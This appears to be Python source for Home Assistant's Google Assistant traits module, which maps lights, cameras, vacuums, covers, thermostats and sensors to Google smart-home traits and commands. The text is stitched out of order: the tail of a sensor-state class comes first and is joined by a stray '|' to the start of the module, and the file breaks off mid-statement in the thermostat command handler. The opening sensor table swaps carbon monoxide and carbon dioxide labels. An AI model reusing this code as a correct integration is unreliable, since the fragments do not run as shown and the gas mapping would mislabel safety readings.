sensor.DEVICE_CLASS_AQI: ("AirQuality", "AQI"),
sensor.DEVICE_CLASS_CO: ("CarbonDioxideLevel", "PARTS_PER_MILLION"),
sensor.DEVICE_CLASS_CO2: ("CarbonMonoxideLevel", "PARTS_PER_MILLION"),
sensor.DEVICE_CLASS_PM25: ("PM2.5", "MICROGRAMS_PER_CUBIC_METER"),
sensor.DEVICE_CLASS_PM10: ("PM10", "MICROGRAMS_PER_CUBIC_METER"),
sensor.DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS: (
"VolatileOrganicCompounds",
"PARTS_PER_MILLION",
),
}
name = TRAIT_SENSOR_STATE
commands = []
@classmethod
def supported(cls, domain, features, device_class, _):
"""Test if state is supported."""
return domain == sensor.DOMAIN and device_class in cls.sensor_types
def sync_attributes(self):
"""Return attributes for a sync request."""
device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
if (data := self.sensor_types.get(device_class)) is not None:
return {
"sensorStatesSupported": {
"name": data[0],
"numericCapabilities": {"rawValueUnit": data[1]},
}
}
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
device_class = self.state.attributes.get(ATTR_DEVICE_CLASS)
if (data := self.sensor_types.get(device_class)) is not None:
return {
"currentSensorStateData": [
{"name": data[0], "rawValue": self.state.state}
]
}
| """Implement the Google Smart Home traits."""
from __future__ import annotations
import logging
from homeassistant.components import (
alarm_control_panel,
binary_sensor,
camera,
cover,
fan,
group,
input_boolean,
input_select,
light,
lock,
media_player,
scene,
script,
select,
sensor,
switch,
vacuum,
)
from homeassistant.components.climate import const as climate
from homeassistant.components.humidifier import const as humidifier
from homeassistant.components.lock import STATE_JAMMED, STATE_UNLOCKING
from homeassistant.components.media_player.const import MEDIA_TYPE_CHANNEL
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_BATTERY_LEVEL,
ATTR_CODE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_MODE,
ATTR_SUPPORTED_FEATURES,
ATTR_TEMPERATURE,
CAST_APP_ID_HOMEASSISTANT,
SERVICE_ALARM_ARM_AWAY,
SERVICE_ALARM_ARM_CUSTOM_BYPASS,
SERVICE_ALARM_ARM_HOME,
SERVICE_ALARM_ARM_NIGHT,
SERVICE_ALARM_DISARM,
SERVICE_ALARM_TRIGGER,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
STATE_IDLE,
STATE_LOCKED,
STATE_OFF,
STATE_ON,
STATE_PAUSED,
STATE_PLAYING,
STATE_STANDBY,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import DOMAIN as HA_DOMAIN
from homeassistant.helpers.network import get_url
from homeassistant.util import color as color_util, dt, temperature as temp_util
from .const import (
CHALLENGE_ACK_NEEDED,
CHALLENGE_FAILED_PIN_NEEDED,
CHALLENGE_PIN_NEEDED,
ERR_ALREADY_ARMED,
ERR_ALREADY_DISARMED,
ERR_ALREADY_STOPPED,
ERR_CHALLENGE_NOT_SETUP,
ERR_FUNCTION_NOT_SUPPORTED,
ERR_NO_AVAILABLE_CHANNEL,
ERR_NOT_SUPPORTED,
ERR_UNSUPPORTED_INPUT,
ERR_VALUE_OUT_OF_RANGE,
)
from .error import ChallengeNeeded, SmartHomeError
_LOGGER = logging.getLogger(__name__)
PREFIX_TRAITS = "action.devices.traits."
TRAIT_CAMERA_STREAM = f"{PREFIX_TRAITS}CameraStream"
TRAIT_ONOFF = f"{PREFIX_TRAITS}OnOff"
TRAIT_DOCK = f"{PREFIX_TRAITS}Dock"
TRAIT_STARTSTOP = f"{PREFIX_TRAITS}StartStop"
TRAIT_BRIGHTNESS = f"{PREFIX_TRAITS}Brightness"
TRAIT_COLOR_SETTING = f"{PREFIX_TRAITS}ColorSetting"
TRAIT_SCENE = f"{PREFIX_TRAITS}Scene"
TRAIT_TEMPERATURE_SETTING = f"{PREFIX_TRAITS}TemperatureSetting"
TRAIT_TEMPERATURE_CONTROL = f"{PREFIX_TRAITS}TemperatureControl"
TRAIT_LOCKUNLOCK = f"{PREFIX_TRAITS}LockUnlock"
TRAIT_FANSPEED = f"{PREFIX_TRAITS}FanSpeed"
TRAIT_MODES = f"{PREFIX_TRAITS}Modes"
TRAIT_INPUTSELECTOR = f"{PREFIX_TRAITS}InputSelector"
TRAIT_OPENCLOSE = f"{PREFIX_TRAITS}OpenClose"
TRAIT_VOLUME = f"{PREFIX_TRAITS}Volume"
TRAIT_ARMDISARM = f"{PREFIX_TRAITS}ArmDisarm"
TRAIT_HUMIDITY_SETTING = f"{PREFIX_TRAITS}HumiditySetting"
TRAIT_TRANSPORT_CONTROL = f"{PREFIX_TRAITS}TransportControl"
TRAIT_MEDIA_STATE = f"{PREFIX_TRAITS}MediaState"
TRAIT_CHANNEL = f"{PREFIX_TRAITS}Channel"
TRAIT_LOCATOR = f"{PREFIX_TRAITS}Locator"
TRAIT_ENERGYSTORAGE = f"{PREFIX_TRAITS}EnergyStorage"
TRAIT_SENSOR_STATE = f"{PREFIX_TRAITS}SensorState"
PREFIX_COMMANDS = "action.devices.commands."
COMMAND_ONOFF = f"{PREFIX_COMMANDS}OnOff"
COMMAND_GET_CAMERA_STREAM = f"{PREFIX_COMMANDS}GetCameraStream"
COMMAND_DOCK = f"{PREFIX_COMMANDS}Dock"
COMMAND_STARTSTOP = f"{PREFIX_COMMANDS}StartStop"
COMMAND_PAUSEUNPAUSE = f"{PREFIX_COMMANDS}PauseUnpause"
COMMAND_BRIGHTNESS_ABSOLUTE = f"{PREFIX_COMMANDS}BrightnessAbsolute"
COMMAND_COLOR_ABSOLUTE = f"{PREFIX_COMMANDS}ColorAbsolute"
COMMAND_ACTIVATE_SCENE = f"{PREFIX_COMMANDS}ActivateScene"
COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT = (
f"{PREFIX_COMMANDS}ThermostatTemperatureSetpoint"
)
COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE = (
f"{PREFIX_COMMANDS}ThermostatTemperatureSetRange"
)
COMMAND_THERMOSTAT_SET_MODE = f"{PREFIX_COMMANDS}ThermostatSetMode"
COMMAND_LOCKUNLOCK = f"{PREFIX_COMMANDS}LockUnlock"
COMMAND_FANSPEED = f"{PREFIX_COMMANDS}SetFanSpeed"
COMMAND_FANSPEEDRELATIVE = f"{PREFIX_COMMANDS}SetFanSpeedRelative"
COMMAND_MODES = f"{PREFIX_COMMANDS}SetModes"
COMMAND_INPUT = f"{PREFIX_COMMANDS}SetInput"
COMMAND_NEXT_INPUT = f"{PREFIX_COMMANDS}NextInput"
COMMAND_PREVIOUS_INPUT = f"{PREFIX_COMMANDS}PreviousInput"
COMMAND_OPENCLOSE = f"{PREFIX_COMMANDS}OpenClose"
COMMAND_OPENCLOSE_RELATIVE = f"{PREFIX_COMMANDS}OpenCloseRelative"
COMMAND_SET_VOLUME = f"{PREFIX_COMMANDS}setVolume"
COMMAND_VOLUME_RELATIVE = f"{PREFIX_COMMANDS}volumeRelative"
COMMAND_MUTE = f"{PREFIX_COMMANDS}mute"
COMMAND_ARMDISARM = f"{PREFIX_COMMANDS}ArmDisarm"
COMMAND_MEDIA_NEXT = f"{PREFIX_COMMANDS}mediaNext"
COMMAND_MEDIA_PAUSE = f"{PREFIX_COMMANDS}mediaPause"
COMMAND_MEDIA_PREVIOUS = f"{PREFIX_COMMANDS}mediaPrevious"
COMMAND_MEDIA_RESUME = f"{PREFIX_COMMANDS}mediaResume"
COMMAND_MEDIA_SEEK_RELATIVE = f"{PREFIX_COMMANDS}mediaSeekRelative"
COMMAND_MEDIA_SEEK_TO_POSITION = f"{PREFIX_COMMANDS}mediaSeekToPosition"
COMMAND_MEDIA_SHUFFLE = f"{PREFIX_COMMANDS}mediaShuffle"
COMMAND_MEDIA_STOP = f"{PREFIX_COMMANDS}mediaStop"
COMMAND_REVERSE = f"{PREFIX_COMMANDS}Reverse"
COMMAND_SET_HUMIDITY = f"{PREFIX_COMMANDS}SetHumidity"
COMMAND_SELECT_CHANNEL = f"{PREFIX_COMMANDS}selectChannel"
COMMAND_LOCATE = f"{PREFIX_COMMANDS}Locate"
COMMAND_CHARGE = f"{PREFIX_COMMANDS}Charge"
TRAITS = []
def register_trait(trait):
"""Decorate a function to register a trait."""
TRAITS.append(trait)
return trait
def _google_temp_unit(units):
"""Return Google temperature unit."""
if units == TEMP_FAHRENHEIT:
return "F"
return "C"
def _next_selected(items: list[str], selected: str | None) -> str | None:
"""Return the next item in a item list starting at given value.
If selected is missing in items, None is returned
"""
try:
index = items.index(selected)
except ValueError:
return None
next_item = 0 if index == len(items) - 1 else index + 1
return items[next_item]
class _Trait:
"""Represents a Trait inside Google Assistant skill."""
commands = []
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return False
def __init__(self, hass, state, config):
"""Initialize a trait for a state."""
self.hass = hass
self.state = state
self.config = config
def sync_attributes(self):
"""Return attributes for a sync request."""
raise NotImplementedError
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
raise NotImplementedError
def can_execute(self, command, params):
"""Test if command can be executed."""
return command in self.commands
async def execute(self, command, data, params, challenge):
"""Execute a trait command."""
raise NotImplementedError
@register_trait
class BrightnessTrait(_Trait):
"""Trait to control brightness of a device.
https://developers.google.com/actions/smarthome/traits/brightness
"""
name = TRAIT_BRIGHTNESS
commands = [COMMAND_BRIGHTNESS_ABSOLUTE]
@staticmethod
def supported(domain, features, device_class, attributes):
"""Test if state is supported."""
if domain == light.DOMAIN:
color_modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
return light.brightness_supported(color_modes)
return False
def sync_attributes(self):
"""Return brightness attributes for a sync request."""
return {}
def query_attributes(self):
"""Return brightness query attributes."""
domain = self.state.domain
response = {}
if domain == light.DOMAIN:
brightness = self.state.attributes.get(light.ATTR_BRIGHTNESS)
if brightness is not None:
response["brightness"] = int(100 * (brightness / 255))
else:
response["brightness"] = 0
return response
async def execute(self, command, data, params, challenge):
"""Execute a brightness command."""
domain = self.state.domain
if domain == light.DOMAIN:
await self.hass.services.async_call(
light.DOMAIN,
light.SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: self.state.entity_id,
light.ATTR_BRIGHTNESS_PCT: params["brightness"],
},
blocking=True,
context=data.context,
)
@register_trait
class CameraStreamTrait(_Trait):
"""Trait to stream from cameras.
https://developers.google.com/actions/smarthome/traits/camerastream
"""
name = TRAIT_CAMERA_STREAM
commands = [COMMAND_GET_CAMERA_STREAM]
stream_info = None
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == camera.DOMAIN:
return features & camera.SUPPORT_STREAM
return False
def sync_attributes(self):
"""Return stream attributes for a sync request."""
return {
"cameraStreamSupportedProtocols": ["hls"],
"cameraStreamNeedAuthToken": False,
"cameraStreamNeedDrmEncryption": False,
}
def query_attributes(self):
"""Return camera stream attributes."""
return self.stream_info or {}
async def execute(self, command, data, params, challenge):
"""Execute a get camera stream command."""
url = await self.hass.components.camera.async_request_stream(
self.state.entity_id, "hls"
)
self.stream_info = {
"cameraStreamAccessUrl": f"{get_url(self.hass)}{url}",
"cameraStreamReceiverAppId": CAST_APP_ID_HOMEASSISTANT,
}
@register_trait
class OnOffTrait(_Trait):
"""Trait to offer basic on and off functionality.
https://developers.google.com/actions/smarthome/traits/onoff
"""
name = TRAIT_ONOFF
commands = [COMMAND_ONOFF]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain in (
group.DOMAIN,
input_boolean.DOMAIN,
switch.DOMAIN,
fan.DOMAIN,
light.DOMAIN,
media_player.DOMAIN,
humidifier.DOMAIN,
)
def sync_attributes(self):
"""Return OnOff attributes for a sync request."""
if self.state.attributes.get(ATTR_ASSUMED_STATE, False):
return {"commandOnlyOnOff": True}
return {}
def query_attributes(self):
"""Return OnOff query attributes."""
return {"on": self.state.state not in (STATE_OFF, STATE_UNKNOWN)}
async def execute(self, command, data, params, challenge):
"""Execute an OnOff command."""
domain = self.state.domain
if domain == group.DOMAIN:
service_domain = HA_DOMAIN
service = SERVICE_TURN_ON if params["on"] else SERVICE_TURN_OFF
else:
service_domain = domain
service = SERVICE_TURN_ON if params["on"] else SERVICE_TURN_OFF
await self.hass.services.async_call(
service_domain,
service,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class ColorSettingTrait(_Trait):
"""Trait to offer color temperature functionality.
https://developers.google.com/actions/smarthome/traits/colortemperature
"""
name = TRAIT_COLOR_SETTING
commands = [COMMAND_COLOR_ABSOLUTE]
@staticmethod
def supported(domain, features, device_class, attributes):
"""Test if state is supported."""
if domain != light.DOMAIN:
return False
color_modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
return light.color_temp_supported(color_modes) or light.color_supported(
color_modes
)
def sync_attributes(self):
"""Return color temperature attributes for a sync request."""
attrs = self.state.attributes
color_modes = attrs.get(light.ATTR_SUPPORTED_COLOR_MODES)
response = {}
if light.color_supported(color_modes):
response["colorModel"] = "hsv"
if light.color_temp_supported(color_modes):
# Max Kelvin is Min Mireds K = 1000000 / mireds
# Min Kelvin is Max Mireds K = 1000000 / mireds
response["colorTemperatureRange"] = {
"temperatureMaxK": color_util.color_temperature_mired_to_kelvin(
attrs.get(light.ATTR_MIN_MIREDS)
),
"temperatureMinK": color_util.color_temperature_mired_to_kelvin(
attrs.get(light.ATTR_MAX_MIREDS)
),
}
return response
def query_attributes(self):
"""Return color temperature query attributes."""
color_mode = self.state.attributes.get(light.ATTR_COLOR_MODE)
color = {}
if light.color_supported([color_mode]):
color_hs = self.state.attributes.get(light.ATTR_HS_COLOR)
brightness = self.state.attributes.get(light.ATTR_BRIGHTNESS, 1)
if color_hs is not None:
color["spectrumHsv"] = {
"hue": color_hs[0],
"saturation": color_hs[1] / 100,
"value": brightness / 255,
}
if light.color_temp_supported([color_mode]):
temp = self.state.attributes.get(light.ATTR_COLOR_TEMP)
# Some faulty integrations might put 0 in here, raising exception.
if temp == 0:
_LOGGER.warning(
"Entity %s has incorrect color temperature %s",
self.state.entity_id,
temp,
)
elif temp is not None:
color["temperatureK"] = color_util.color_temperature_mired_to_kelvin(
temp
)
response = {}
if color:
response["color"] = color
return response
async def execute(self, command, data, params, challenge):
"""Execute a color temperature command."""
if "temperature" in params["color"]:
temp = color_util.color_temperature_kelvin_to_mired(
params["color"]["temperature"]
)
min_temp = self.state.attributes[light.ATTR_MIN_MIREDS]
max_temp = self.state.attributes[light.ATTR_MAX_MIREDS]
if temp < min_temp or temp > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
f"Temperature should be between {min_temp} and {max_temp}",
)
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_COLOR_TEMP: temp},
blocking=True,
context=data.context,
)
elif "spectrumRGB" in params["color"]:
# Convert integer to hex format and left pad with 0's till length 6
hex_value = f"{params['color']['spectrumRGB']:06x}"
color = color_util.color_RGB_to_hs(
*color_util.rgb_hex_to_rgb_list(hex_value)
)
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_HS_COLOR: color},
blocking=True,
context=data.context,
)
elif "spectrumHSV" in params["color"]:
color = params["color"]["spectrumHSV"]
saturation = color["saturation"] * 100
brightness = color["value"] * 255
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: self.state.entity_id,
light.ATTR_HS_COLOR: [color["hue"], saturation],
light.ATTR_BRIGHTNESS: brightness,
},
blocking=True,
context=data.context,
)
@register_trait
class SceneTrait(_Trait):
"""Trait to offer scene functionality.
https://developers.google.com/actions/smarthome/traits/scene
"""
name = TRAIT_SCENE
commands = [COMMAND_ACTIVATE_SCENE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain in (scene.DOMAIN, script.DOMAIN)
def sync_attributes(self):
"""Return scene attributes for a sync request."""
# Neither supported domain can support sceneReversible
return {}
def query_attributes(self):
"""Return scene query attributes."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute a scene command."""
# Don't block for scripts as they can be slow.
await self.hass.services.async_call(
self.state.domain,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=self.state.domain != script.DOMAIN,
context=data.context,
)
@register_trait
class DockTrait(_Trait):
"""Trait to offer dock functionality.
https://developers.google.com/actions/smarthome/traits/dock
"""
name = TRAIT_DOCK
commands = [COMMAND_DOCK]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == vacuum.DOMAIN
def sync_attributes(self):
"""Return dock attributes for a sync request."""
return {}
def query_attributes(self):
"""Return dock query attributes."""
return {"isDocked": self.state.state == vacuum.STATE_DOCKED}
async def execute(self, command, data, params, challenge):
"""Execute a dock command."""
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_RETURN_TO_BASE,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class LocatorTrait(_Trait):
"""Trait to offer locate functionality.
https://developers.google.com/actions/smarthome/traits/locator
"""
name = TRAIT_LOCATOR
commands = [COMMAND_LOCATE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_LOCATE
def sync_attributes(self):
"""Return locator attributes for a sync request."""
return {}
def query_attributes(self):
"""Return locator query attributes."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute a locate command."""
if params.get("silence", False):
raise SmartHomeError(
ERR_FUNCTION_NOT_SUPPORTED,
"Silencing a Locate request is not yet supported",
)
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_LOCATE,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class EnergyStorageTrait(_Trait):
"""Trait to offer EnergyStorage functionality.
https://developers.google.com/actions/smarthome/traits/energystorage
"""
name = TRAIT_ENERGYSTORAGE
commands = [COMMAND_CHARGE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_BATTERY
def sync_attributes(self):
"""Return EnergyStorage attributes for a sync request."""
return {
"isRechargeable": True,
"queryOnlyEnergyStorage": True,
}
def query_attributes(self):
"""Return EnergyStorage query attributes."""
battery_level = self.state.attributes.get(ATTR_BATTERY_LEVEL)
if battery_level == 100:
descriptive_capacity_remaining = "FULL"
elif 75 <= battery_level < 100:
descriptive_capacity_remaining = "HIGH"
elif 50 <= battery_level < 75:
descriptive_capacity_remaining = "MEDIUM"
elif 25 <= battery_level < 50:
descriptive_capacity_remaining = "LOW"
elif 0 <= battery_level < 25:
descriptive_capacity_remaining = "CRITICALLY_LOW"
return {
"descriptiveCapacityRemaining": descriptive_capacity_remaining,
"capacityRemaining": [{"rawValue": battery_level, "unit": "PERCENTAGE"}],
"capacityUntilFull": [
{"rawValue": 100 - battery_level, "unit": "PERCENTAGE"}
],
"isCharging": self.state.state == vacuum.STATE_DOCKED,
"isPluggedIn": self.state.state == vacuum.STATE_DOCKED,
}
async def execute(self, command, data, params, challenge):
"""Execute a dock command."""
raise SmartHomeError(
ERR_FUNCTION_NOT_SUPPORTED,
"Controlling charging of a vacuum is not yet supported",
)
@register_trait
class StartStopTrait(_Trait):
"""Trait to offer StartStop functionality.
https://developers.google.com/actions/smarthome/traits/startstop
"""
name = TRAIT_STARTSTOP
commands = [COMMAND_STARTSTOP, COMMAND_PAUSEUNPAUSE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == vacuum.DOMAIN:
return True
if domain == cover.DOMAIN and features & cover.SUPPORT_STOP:
return True
return False
def sync_attributes(self):
"""Return StartStop attributes for a sync request."""
domain = self.state.domain
if domain == vacuum.DOMAIN:
return {
"pausable": self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& vacuum.SUPPORT_PAUSE
!= 0
}
if domain == cover.DOMAIN:
return {}
def query_attributes(self):
"""Return StartStop query attributes."""
domain = self.state.domain
state = self.state.state
if domain == vacuum.DOMAIN:
return {
"isRunning": state == vacuum.STATE_CLEANING,
"isPaused": state == vacuum.STATE_PAUSED,
}
if domain == cover.DOMAIN:
return {"isRunning": state in (cover.STATE_CLOSING, cover.STATE_OPENING)}
async def execute(self, command, data, params, challenge):
"""Execute a StartStop command."""
domain = self.state.domain
if domain == vacuum.DOMAIN:
return await self._execute_vacuum(command, data, params, challenge)
if domain == cover.DOMAIN:
return await self._execute_cover(command, data, params, challenge)
async def _execute_vacuum(self, command, data, params, challenge):
"""Execute a StartStop command."""
if command == COMMAND_STARTSTOP:
if params["start"]:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_START,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_STOP,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
elif command == COMMAND_PAUSEUNPAUSE:
if params["pause"]:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_PAUSE,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_START,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
async def _execute_cover(self, command, data, params, challenge):
"""Execute a StartStop command."""
if command == COMMAND_STARTSTOP:
if params["start"] is False:
if (
self.state.state
in (
cover.STATE_CLOSING,
cover.STATE_OPENING,
)
or self.state.attributes.get(ATTR_ASSUMED_STATE)
):
await self.hass.services.async_call(
self.state.domain,
cover.SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
raise SmartHomeError(
ERR_ALREADY_STOPPED, "Cover is already stopped"
)
else:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "Starting a cover is not supported"
)
else:
raise SmartHomeError(
ERR_NOT_SUPPORTED, f"Command {command} is not supported"
)
@register_trait
class TemperatureControlTrait(_Trait):
"""Trait for devices (other than thermostats) that support controlling temperature. Workaround for Temperature sensors.
https://developers.google.com/assistant/smarthome/traits/temperaturecontrol
"""
name = TRAIT_TEMPERATURE_CONTROL
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return (
domain == sensor.DOMAIN and device_class == sensor.DEVICE_CLASS_TEMPERATURE
)
def sync_attributes(self):
"""Return temperature attributes for a sync request."""
return {
"temperatureUnitForUX": _google_temp_unit(
self.hass.config.units.temperature_unit
),
"queryOnlyTemperatureSetting": True,
"temperatureRange": {
"minThresholdCelsius": -100,
"maxThresholdCelsius": 100,
},
}
def query_attributes(self):
"""Return temperature states."""
response = {}
unit = self.hass.config.units.temperature_unit
current_temp = self.state.state
if current_temp not in (STATE_UNKNOWN, STATE_UNAVAILABLE):
temp = round(temp_util.convert(float(current_temp), unit, TEMP_CELSIUS), 1)
response["temperatureSetpointCelsius"] = temp
response["temperatureAmbientCelsius"] = temp
return response
async def execute(self, command, data, params, challenge):
"""Unsupported."""
raise SmartHomeError(ERR_NOT_SUPPORTED, "Execute is not supported by sensor")
@register_trait
class TemperatureSettingTrait(_Trait):
"""Trait to offer handling both temperature point and modes functionality.
https://developers.google.com/actions/smarthome/traits/temperaturesetting
"""
name = TRAIT_TEMPERATURE_SETTING
commands = [
COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE,
COMMAND_THERMOSTAT_SET_MODE,
]
# We do not support "on" as we are unable to know how to restore
# the last mode.
hvac_to_google = {
climate.HVAC_MODE_HEAT: "heat",
climate.HVAC_MODE_COOL: "cool",
climate.HVAC_MODE_OFF: "off",
climate.HVAC_MODE_AUTO: "auto",
climate.HVAC_MODE_HEAT_COOL: "heatcool",
climate.HVAC_MODE_FAN_ONLY: "fan-only",
climate.HVAC_MODE_DRY: "dry",
}
google_to_hvac = {value: key for key, value in hvac_to_google.items()}
preset_to_google = {climate.PRESET_ECO: "eco"}
google_to_preset = {value: key for key, value in preset_to_google.items()}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == climate.DOMAIN
@property
def climate_google_modes(self):
"""Return supported Google modes."""
modes = []
attrs = self.state.attributes
for mode in attrs.get(climate.ATTR_HVAC_MODES, []):
google_mode = self.hvac_to_google.get(mode)
if google_mode and google_mode not in modes:
modes.append(google_mode)
for preset in attrs.get(climate.ATTR_PRESET_MODES, []):
google_mode = self.preset_to_google.get(preset)
if google_mode and google_mode not in modes:
modes.append(google_mode)
return modes
def sync_attributes(self):
"""Return temperature point and modes attributes for a sync request."""
response = {}
response["thermostatTemperatureUnit"] = _google_temp_unit(
self.hass.config.units.temperature_unit
)
modes = self.climate_google_modes
# Some integrations don't support modes (e.g. opentherm), but Google doesn't
# support changing the temperature if we don't have any modes. If there's
# only one Google doesn't support changing it, so the default mode here is
# only cosmetic.
if len(modes) == 0:
modes.append("heat")
if "off" in modes and any(
mode in modes for mode in ("heatcool", "heat", "cool")
):
modes.append("on")
response["availableThermostatModes"] = modes
return response
def query_attributes(self):
"""Return temperature point and modes query attributes."""
response = {}
attrs = self.state.attributes
unit = self.hass.config.units.temperature_unit
operation = self.state.state
preset = attrs.get(climate.ATTR_PRESET_MODE)
supported = attrs.get(ATTR_SUPPORTED_FEATURES, 0)
if preset in self.preset_to_google:
response["thermostatMode"] = self.preset_to_google[preset]
else:
response["thermostatMode"] = self.hvac_to_google.get(operation, "none")
current_temp = attrs.get(climate.ATTR_CURRENT_TEMPERATURE)
if current_temp is not None:
response["thermostatTemperatureAmbient"] = round(
temp_util.convert(current_temp, unit, TEMP_CELSIUS), 1
)
current_humidity = attrs.get(climate.ATTR_CURRENT_HUMIDITY)
if current_humidity is not None:
response["thermostatHumidityAmbient"] = current_humidity
if operation in (climate.HVAC_MODE_AUTO, climate.HVAC_MODE_HEAT_COOL):
if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
response["thermostatTemperatureSetpointHigh"] = round(
temp_util.convert(
attrs[climate.ATTR_TARGET_TEMP_HIGH], unit, TEMP_CELSIUS
),
1,
)
response["thermostatTemperatureSetpointLow"] = round(
temp_util.convert(
attrs[climate.ATTR_TARGET_TEMP_LOW], unit, TEMP_CELSIUS
),
1,
)
else:
if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
target_temp = round(
temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
)
response["thermostatTemperatureSetpointHigh"] = target_temp
response["thermostatTemperatureSetpointLow"] = target_temp
else:
if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
response["thermostatTemperatureSetpoint"] = round(
temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
)
return response
async def execute(self, command, data, params, challenge):
"""Execute a temperature point or mode command."""
# All sent in temperatures are always in Celsius
unit = self.hass.config.units.temperature_unit
min_temp = self.state.attributes[climate.ATTR_MIN_TEMP]
max_temp = self.state.attributes[climate.ATTR_MAX_TEMP]
if command == COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT:
temp = temp_util.convert(
params["thermostatTemperatureSetpoint"], TEMP_CELSIUS, unit
)
if unit == TEMP_FAHRENHEIT:
temp = round(temp)
if temp < min_temp or temp > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
f"Temperature should be between {min_temp} and {max_temp}",
)
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: self.state.entity_id, ATTR_TEMPERATURE: temp},
blocking=True,
context=data.context,
)
elif command == COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE:
temp_high = temp_util.convert(
params["thermostatTemperatureSetpointHigh"], TEMP_CELSIUS, unit
)
if unit == TEMP_FAHRENHEIT:
temp_high = round(temp_high)
if temp_high < min_temp or temp_high > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
(
f"Upper bound for temperature range should be between "
f"{min_temp} and {max_temp}"
),
)
temp_low = temp_util.convert(
params["thermostatTemperatureSetpointLow"], TEMP_CELSIUS, unit
)
if unit == TEMP_FAHRENHEIT:
temp_low = round(temp_low)
if temp_low < min_temp or temp_low > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
(
f"Lower bound for temperature range should be between "
f"{min_temp} and {max_temp}"
),
)
supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES)
svc_data = {ATTR_ENTITY_ID: self.state.entity_id}
if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
svc_data[climate.ATTR_TARGET_TEMP_HIGH] = temp_high
svc_data[climate.ATTR_TARGET_TEMP_LOW] = temp_low
else:
svc_data[ATTR_TEMPERATURE] = (temp_high + temp_low) / 2
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_TEMPERATURE,
svc_data,
blocking=True,
context=data.context,
)
elif command == COMMAND_THERMOSTAT_SET_MODE:
target_mode = params["thermostatMode"]
supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES)
if target_mode == "on":
await self.hass.services.async_call(
climate.DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
return
if target_mode == "off":
